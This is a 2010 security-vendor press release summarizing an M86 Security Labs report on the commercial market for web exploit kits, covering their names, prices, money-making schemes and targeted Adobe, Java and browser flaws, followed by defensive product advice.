M86 Security Labs Report Details Web Exploit Kits

Web Exploits - There's an App for That details the rise of distributed, monetized "exploit" kits

May 5, 2010

4 Min Read


Orange, Calif. and London, UK - APRIL 28, 2010 - M86 Security, the global expert in Web and email threat protection, today announced the release of the latest security report from M86 Security Labs, "Web Exploits - There's an App for That," which details the rise of distributed, monetized "exploit" kits, with M86 Security Labs counting more than a dozen new attack kits being launched in just the last six months. M86 Security Labs also has noted that most of the exploit kits were in Russian, such as Adpack and Fragus, perhaps indicating the location of buyers, and the majority using Adobe Flash, Java classes, and PDF-based exploits.

Code used in the exploit kits observed, particularly for malicious Javascript code, is often obfuscated, greatly reducing the ability of many security products to even 'read' the code. All kits observed pose a serious threat to Web and email with applications that allow less technical individuals to easily and inexpensively run cyber attacks. These kits have quickly become a major driver of Internet exploits in the "wild."

Report Underscores Global Impact of the Attack Kit Business

Altogether M86 Security Labs investigated more than 25 attack kits, many of them in Russian, such as Crimepack, WebAttacker, MyPolySploit, XCore, UniquePack, LuckySploit, Yes Toolkit, Liberty, Fiesta, Eleonore and more. One of the most expensive attack kits found was LuckySploit at over $1000 USD, with most in the $400-$1000 USD range, and some selling for as little as $100 USD.

"Exploit kits have changed the cybercrime industry in a very short period of time," said Bradley Anstis, vice president of technology strategy, M86 Security. "People can launch attacks without even knowing a line of code, and the infrastructure now exists to pay the attacker per exploit achieved. With an attack kit there is literally 'an app for that' and it is driving the explosive growth in Internet-borne threats such as spam and zero-day attacks with new kits popping up every day. This latest research report details the anatomy of these kits, providing insight into the evolution and the skyrocketing increase in the number of attacks."

Creators of exploit kits can make money by offering various services, such as: ? The sale of exploit kits for a flat fee ? The purchase of an obfuscator replacement for additional fee (to prevent anti-virus software from recognizing malicious code) ? Extra cost to cover any new hosting domain installations (in the event the current domain is discovered and becomes blacklisted by Security Vendors) ? Simply adding new exploits to increase the successful exploitation rate

Users of exploit kits have many ways of making money as well. Pay-Per-Install (PPI) programs are one example where the criminals are paid for installing third-party malware. In this case, the exploit kit operator finds a suitable PPI program and becomes an affiliate earning money for each successful install.

Most kits provide a different set of exploits for different browsers - from the antiquated MDAC exploit for Internet Explorer 6 to the infamous PDF exploits printf, collectEmailInfo and getIcon, which affect the vast user base of Adobe Acrobat/Reader users, and an increasing number of Flash and Java class vulnerabilities. The most successful exploitations are zero-day exploits. Most often, the exploit kit creators continually update the set of exploits included in their product to maintain a high exploitation rate.

In the latest M86 Report, an FS Pack Admin Console shows 5,032 successful installs for the day. Assuming a PPI model where the affiliate is earning a modest $100.00 USD per 1,000 installs, this would result in revenue of about $500.00 USD for the day.

Organizations and individuals seeking to protect their computers and information from cybercriminals should incorporate solutions that detect zero-day exploits, as well as remedy Flash, Adobe and Java class vulnerabilities to protect against the growing "exploit" market. Exploit kits designed to attack many of these vulnerabilities, particularly Javascript, employ obfuscation, further reducing the effectiveness of traditional signature-based security products. Real-time code analysis tools, however, are able to close to this growing threat window.

The "Web Exploits - There's an App for That" report is available from M86 Security Labs at: http://www.m86security.com/documents/pdfs/security_labs/m86_web_exploits_report.pdf.

About M86 Security M86 Security is the global expert in real-time threat protection and the industry's leading Secure Web Gateway provider. The company's appliance, software, and Software as a Service (SaaS) solutions for Web and email security protect more than 24,000 customers and over 17 million users worldwide. M86 products use patented real-time code analysis and behavior-based malware detection technologies as well as threat intelligence from M86 Security Labs to protect networks against new and advanced threats, secure confidential information, and ensure regulatory compliance. The company is based in Orange, California with international headquarters in London and development centers in California, Israel, and New Zealand. For more information about M86 Security, please visit http://www.m86security.com/.

Follow M86 Security on Twitter at: http://twitter.com/M86Security Facebook at: http://www.facebook.com/M86Sec M86 Security Labs Blog at: http://www.m86security.com/trace/traceblog.asp

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like

More Insights